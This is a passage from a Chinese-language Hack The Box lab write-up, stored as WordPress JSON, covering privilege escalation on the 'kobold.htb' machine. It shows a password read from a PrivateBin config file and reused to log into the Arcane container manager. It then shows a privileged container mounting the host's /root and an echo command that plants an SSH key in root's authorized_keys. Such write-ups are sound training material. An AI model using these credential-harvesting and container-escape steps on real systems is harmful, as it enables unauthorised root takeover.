\u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774322436882-f4fa9fbe-2112-4ddd-a01f-c0c1c7d0dbda.png\" alt=\"\" \/><\/p>\n<p>\u547d\u4ee4\u6267\u884c\u6210\u529f\uff01\u73b0\u5728\u5217\u51fa\u5bb9\u5668\u6839\u76ee\u5f55\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774322621880-6cbb0127-b6d1-459a-8144-12d6719d19bf.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u76ee\u5f55<code>\/srv<\/code>\uff0c\u5217\u51fa\u8be5\u76ee\u5f55\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-shell\">ls -lAR \/srv<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774322668847-093426a0-48bc-4c5d-9af0-08a198a11f64.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>\/srv<\/code>\u76ee\u5f55\u4e3a<code>PrivateBin<\/code>\u7684\u6570\u636e\u4e3b\u76ee\u5f55\uff01\u5c1d\u8bd5\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6<code>\/srv\/cfg\/conf.php<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">cat \/srv\/cfg\/conf.php<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774322833514-d6311961-a93d-460b-af07-961982696f66.png\" alt=\"\" \/><\/p>\n<p>\u7ecf\u8fc7\u4e00\u6bb5\u65f6\u95f4\u7684\u7ffb\u627e\uff0c\u6210\u529f\u5728\u8be5\u6587\u4ef6\u4e2d\u53d1\u73b0\u914d\u7f6e\u7684<code>MySQL<\/code>\u8fde\u63a5\u5bc6\u7801\uff1a<code>ComplexP@sswordAdmin1928<\/code>\u3002\u4f46\u5c1d\u8bd5\u4f7f\u7528<code>find<\/code>\u547d\u4ee4\u67e5\u627e<code>MySQL<\/code>\u4e3b\u8fdb\u7a0b\u76f8\u5173\u7a0b\u5e8f\uff0c\u6ca1\u6709\u7ed3\u679c\uff1a<\/p>\n<pre><code class=\"language-shell\">find \/ -name \"*mysql*\"<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774323076812-62288945-026e-4d1e-9c31-38d198234b46.png\" alt=\"\" \/><\/p>\n<p>\u5224\u65ad\u8be5\u5bc6\u7801\u4e0e<code>MySQL<\/code>\u65e0\u5173\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5982\u4e0b\u51ed\u636e\u767b\u5f55<code>Arcane<\/code>\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>arcane<\/code>\uff08\u4e3a<code>Arcane<\/code>\u9ed8\u8ba4\u7528\u6237\u540d\uff09<\/li>\n<li>\u5bc6\u7801\uff1a<code>ComplexP@sswordAdmin1928<\/code><\/li>\n<\/ul>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774323217787-13b1ade4-c875-420f-91fd-5db08ea43e29.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\uff01<\/p>\n<h2>Arcane\u5bb9\u5668\u7ba1\u7406\u7cfb\u7edf\u63d0\u6743<\/h2>\n<p>\u767b\u5f55\u5bb9\u5668\u7ba1\u7406\u7cfb\u7edf\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u6302\u8f7d\u5bbf\u4e3b\u673a\u5173\u952e\u76ee\u5f55\u7684<code>Docker<\/code>\u5bb9\u5668\u65b9\u6cd5\u8fdb\u884c\u63d0\u6743\u3002\u9996\u5148\u70b9\u51fb<code>Images<\/code>\uff0c\u67e5\u770b\u9776\u673a\u4e2d\u7684<code>Docker<\/code>\u955c\u50cf\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774323387030-beedea3d-df75-4901-b0e1-38673e9e966b.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u4e24\u4e2a\u955c\u50cf\uff1a<code>mysql<\/code>\u548c<code>privatebin\/nginx-fpm-alpine:2.0.2<\/code>\uff0c\u51b3\u5b9a\u521b\u5efa<code>privatebin<\/code>\u955c\u50cf\uff0c\u5c06<code>\/root<\/code>\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u5185\uff0c\u5411<code>SSH<\/code>\u76ee\u5f55\u5199\u5165\u516c\u94a5\u6587\u4ef6\u5b9e\u73b0\u63d0\u6743\u3002<\/p>\n<p>\u9996\u5148\u5207\u6362\u5230<code>Containers<\/code>\u529f\u80fd\u754c\u9762\uff0c\u70b9\u51fb<code>Create Container<\/code>\u6309\u94ae\u8c03\u8d77\u914d\u7f6e\u5bf9\u8bdd\u6846\uff0c\u5728<code>Basic<\/code>\u9009\u9879\u5361\u4e2d\u8f93\u5165\u5bb9\u5668\u540d\u79f0\u3001\u955c\u50cf\u540d\u79f0\uff0c\u8fd0\u884c\u7528\u6237\u5fc5\u987b\u4e3a<code>root<\/code>\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774323643770-6aa9e365-bae6-4c8a-8796-04a937af645e.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u5207\u6362\u5230<code>Volumns<\/code>\u9009\u9879\u5361\uff0c\u8bbe\u7f6e\u5c06\u5bbf\u4e3b\u673a<code>\/root<\/code>\u76ee\u5f55\u6302\u8f7d\u81f3\u5bb9\u5668<code>\/mnt\/root<\/code>\u76ee\u5f55\uff0c\u5b8c\u6210\u540e\u5207\u6362\u5230<code>Network &amp; Security<\/code>\u9009\u9879\u5361\uff0c\u52fe\u9009\u7279\u6743\u5bb9\u5668\u4e00\u9879\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774323771820-2b6950ff-82d8-4536-b71d-4bffc4a41950.png\" alt=\"\" \/><\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p>&nbsp;<\/p>\n<p>\u5168\u90e8\u9879\u76ee\u914d\u7f6e\u5b8c\u6bd5\u540e\u70b9\u51fb<code>Create Container<\/code>\u521b\u5efa\u5bb9\u5668\uff0c\u5f85\u5176\u8fd0\u884c\u540e\uff0c\u70b9\u51fb\u65b0\u521b\u5efa\u7684\u5bb9\u5668\uff0c\u5207\u6362\u5230<code>Shell<\/code>\u9009\u9879\u5361\uff0c\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u5c06\u516c\u94a5\u5199\u5165<code>\/mnt\/root\/.ssh\/authorized_keys<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">echo \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINuzVyK24R1psN4xjfxvl2APY785y5Rg7tuQUC2HASki root@misaka19008-vm\" &gt; \/mnt\/root\/.ssh\/authorized_keys<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774324105011-ae2c769f-2f4f-4750-a0f7-a353ad76eaf7.png\" alt=\"\" \/><\/p>\n<p>\u6700\u540e\u4f7f\u7528<code>SSH<\/code>\u767b\u5f55<code>root<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh root@kobold.htb<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1774324172347-858a652a-7135-46df-b1f9-764a47c97f9c.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.63.60\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.129.63.60 (10 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"none","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","_seopress_analysis_target_kw":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[2,14,6],"tags":[],"class_list":["post-418","post","type-post","status-publish","format-standard","hentry","category-htb_seasonal","category-linux_machines","category-htb_season_linux"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/418","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=418"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/418\/revisions"}],"predecessor-version":[{"id":420,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/418\/revisions\/420"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=418"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=418"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=418"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}